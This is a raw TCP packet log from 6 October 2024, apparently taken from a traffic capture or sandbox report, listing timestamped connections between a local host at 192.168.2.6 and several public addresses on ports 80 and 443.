                                                                                                                            Oct 6, 2024 13:50:07.662723064 CEST4973980192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:07.662796974 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.662863016 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.662869930 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.664505005 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.664551973 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.664560080 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.666184902 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.666351080 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.666358948 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.667637110 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.667700052 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.667707920 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.669255018 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.669579029 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.669585943 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.670697927 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.670728922 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.670783997 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.670792103 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.670831919 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.672040939 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.673641920 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.673681021 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.673737049 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.673744917 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.673785925 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.680324078 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.680367947 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.680402994 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.680425882 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.680433035 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.680840015 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.680882931 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.680886984 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.680902004 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.680927992 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.681500912 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.681540012 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.681551933 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.681560040 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.682408094 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.682436943 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.684720039 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.684794903 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.684843063 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.684850931 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.684891939 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.685249090 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.686784029 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.686840057 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.686887026 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.686896086 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.686937094 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.690587997 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.690628052 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.690651894 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.690681934 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.690692902 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.690732956 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.695687056 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.695772886 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.695806026 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.695836067 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.695837021 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.695848942 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.695877075 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.704061985 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.704102039 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.704128027 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.704155922 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.704174042 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.704191923 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.704216003 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.704231977 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.704241037 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.704252958 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.704289913 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.710033894 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.710079908 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.710114002 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.710150003 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.710174084 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.710186005 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.710201025 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.716113091 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.716134071 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.716167927 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.716197968 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.716202021 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.716214895 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.716228008 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.716244936 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.716259956 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.716268063 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.716310978 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.994106054 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.997566938 CEST49745443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:07.997597933 CEST4434974523.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.052825928 CEST49744443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:08.052862883 CEST4434974413.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.053751945 CEST4434974413.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.078272104 CEST49744443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:08.123409986 CEST4434974413.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.755064964 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.755137920 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.755166054 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.755192995 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.755209923 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:08.755225897 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.755234957 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:08.755259037 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.755297899 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.755307913 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.755321980 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:08.755328894 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.755356073 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:08.755400896 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.755428076 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.755443096 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:08.755450964 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.755477905 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.755482912 CEST8049740165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.755501032 CEST8049740165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.755502939 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:08.755502939 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.755511999 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.755515099 CEST8049740165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.755528927 CEST8049740165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.755543947 CEST8049740165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.755558014 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.755558968 CEST8049740165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.755573034 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:08.755580902 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.755590916 CEST4974080192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:08.755603075 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.755625010 CEST4974080192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:08.755630016 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:08.755650997 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.755670071 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:08.755676985 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.755729914 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.755762100 CEST8049740165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.755774975 CEST8049740165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.755774975 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:08.755820990 CEST4974080192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:08.755832911 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:08.755882025 CEST8049740165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.755924940 CEST4974080192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:08.756309032 CEST8049740165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.756346941 CEST4974080192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:08.756391048 CEST8049750165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.756403923 CEST8049750165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.756417990 CEST8049750165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.756433010 CEST8049750165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.756449938 CEST4975080192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:08.756493092 CEST4975080192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:08.756532907 CEST8049750165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.756546974 CEST8049750165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.756560087 CEST8049750165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.756575108 CEST8049750165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.756588936 CEST8049750165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.756603003 CEST8049750165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.756612062 CEST4975080192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:08.756612062 CEST4975080192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:08.756623983 CEST4975080192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:08.756625891 CEST8049740165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.756639957 CEST8049750165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.756669998 CEST4974080192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:08.756695986 CEST4975080192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:08.760235071 CEST44349751104.17.249.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.763945103 CEST44349748142.250.184.196192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.766685009 CEST49751443192.168.2.6104.17.249.203
                                                                                                                            Oct 6, 2024 13:50:08.766709089 CEST44349751104.17.249.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.767170906 CEST44349751104.17.249.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.768484116 CEST49748443192.168.2.6142.250.184.196
                                                                                                                            Oct 6, 2024 13:50:08.768497944 CEST44349748142.250.184.196192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.769608021 CEST44349748142.250.184.196192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.769675970 CEST49748443192.168.2.6142.250.184.196
                                                                                                                            Oct 6, 2024 13:50:08.771183968 CEST49751443192.168.2.6104.17.249.203
                                                                                                                            Oct 6, 2024 13:50:08.771363974 CEST44349751104.17.249.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.784334898 CEST49748443192.168.2.6142.250.184.196
                                                                                                                            Oct 6, 2024 13:50:08.784406900 CEST44349748142.250.184.196192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.786139011 CEST49751443192.168.2.6104.17.249.203
                                                                                                                            Oct 6, 2024 13:50:08.796648026 CEST49754443192.168.2.6184.28.90.27
                                                                                                                            Oct 6, 2024 13:50:08.796674967 CEST44349754184.28.90.27192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.796777010 CEST49754443192.168.2.6184.28.90.27
                                                                                                                            Oct 6, 2024 13:50:08.803445101 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:08.803457975 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.831410885 CEST44349751104.17.249.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.847886086 CEST4434974413.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.847934961 CEST4434974413.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.847985029 CEST4434974413.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.848011971 CEST49744443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:08.848056078 CEST4434974413.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.848073006 CEST49744443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:08.848104000 CEST49744443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:08.884622097 CEST49754443192.168.2.6184.28.90.27
                                                                                                                            Oct 6, 2024 13:50:08.884637117 CEST44349754184.28.90.27192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.908224106 CEST49748443192.168.2.6142.250.184.196
                                                                                                                            Oct 6, 2024 13:50:08.908232927 CEST44349748142.250.184.196192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.908654928 CEST49755443192.168.2.6163.181.92.228
                                                                                                                            Oct 6, 2024 13:50:08.908691883 CEST44349755163.181.92.228192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.908751011 CEST49755443192.168.2.6163.181.92.228
                                                                                                                            Oct 6, 2024 13:50:08.908940077 CEST49755443192.168.2.6163.181.92.228
                                                                                                                            Oct 6, 2024 13:50:08.908957005 CEST44349755163.181.92.228192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.916840076 CEST44349751104.17.249.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.916903973 CEST44349751104.17.249.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.916949034 CEST44349751104.17.249.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.916950941 CEST49751443192.168.2.6104.17.249.203
                                                                                                                            Oct 6, 2024 13:50:08.916970968 CEST44349751104.17.249.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.917013884 CEST49751443192.168.2.6104.17.249.203
                                                                                                                            Oct 6, 2024 13:50:08.917025089 CEST44349751104.17.249.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.917098045 CEST44349751104.17.249.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.917150974 CEST49751443192.168.2.6104.17.249.203
                                                                                                                            Oct 6, 2024 13:50:08.917556047 CEST49751443192.168.2.6104.17.249.203
                                                                                                                            Oct 6, 2024 13:50:08.917570114 CEST44349751104.17.249.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.933221102 CEST4434974413.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.933283091 CEST4434974413.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.933404922 CEST49744443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:08.933404922 CEST49744443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:08.933439970 CEST4434974413.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.933490038 CEST49744443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:08.934741974 CEST4434974413.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.934786081 CEST4434974413.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.934818983 CEST49744443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:08.934828997 CEST4434974413.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:08.934847116 CEST49744443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:08.934873104 CEST49744443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.018548012 CEST4434974413.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.018600941 CEST4434974413.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.018631935 CEST49744443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.018665075 CEST4434974413.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.018688917 CEST49744443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.018713951 CEST49744443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.019263029 CEST4434974413.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.019306898 CEST4434974413.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.019331932 CEST49744443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.019340038 CEST4434974413.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.019359112 CEST49744443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.019382000 CEST49744443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.020826101 CEST4434974413.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.020868063 CEST4434974413.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.020901918 CEST49744443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.020910025 CEST4434974413.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.020935059 CEST49744443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.020958900 CEST49744443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.021931887 CEST4434974413.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.021976948 CEST4434974413.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.022006035 CEST49744443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.022013903 CEST4434974413.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.022042036 CEST49744443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.022057056 CEST49744443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.096153021 CEST49748443192.168.2.6142.250.184.196
                                                                                                                            Oct 6, 2024 13:50:09.104749918 CEST4434974413.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.104793072 CEST4434974413.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.104954004 CEST49744443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.104954958 CEST49744443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.105021954 CEST4434974413.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.105088949 CEST49744443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.105361938 CEST4434974413.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.105411053 CEST4434974413.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.105433941 CEST49744443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.105443954 CEST4434974413.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.105462074 CEST49744443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.105492115 CEST49744443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.106079102 CEST4434974413.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.106117964 CEST4434974413.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.106138945 CEST49744443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.106147051 CEST4434974413.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.106170893 CEST49744443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.106183052 CEST49744443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.106708050 CEST4434974413.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.106750965 CEST4434974413.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.106786013 CEST49744443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.106792927 CEST4434974413.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.106822014 CEST49744443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.106831074 CEST49744443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.107544899 CEST4434974413.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.107589960 CEST4434974413.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.107621908 CEST49744443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.107629061 CEST4434974413.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.107654095 CEST49744443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.107676029 CEST49744443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.108428001 CEST4434974413.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.108442068 CEST4434974413.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.108488083 CEST49744443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.108496904 CEST4434974413.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.108515024 CEST49744443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.108541965 CEST49744443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.108553886 CEST4434974413.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.108613014 CEST49744443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.108619928 CEST4434974413.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.108659029 CEST49744443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.108669043 CEST4434974413.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.108680010 CEST49744443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.108690977 CEST4434974413.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.158593893 CEST49756443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.158632040 CEST4434975613.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.158698082 CEST49756443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.160201073 CEST49757443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.160238028 CEST4434975713.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.160329103 CEST49756443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.160345078 CEST4434975613.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.160365105 CEST49757443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.161561966 CEST49758443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.161572933 CEST4434975813.107.246.60192.168.2.6
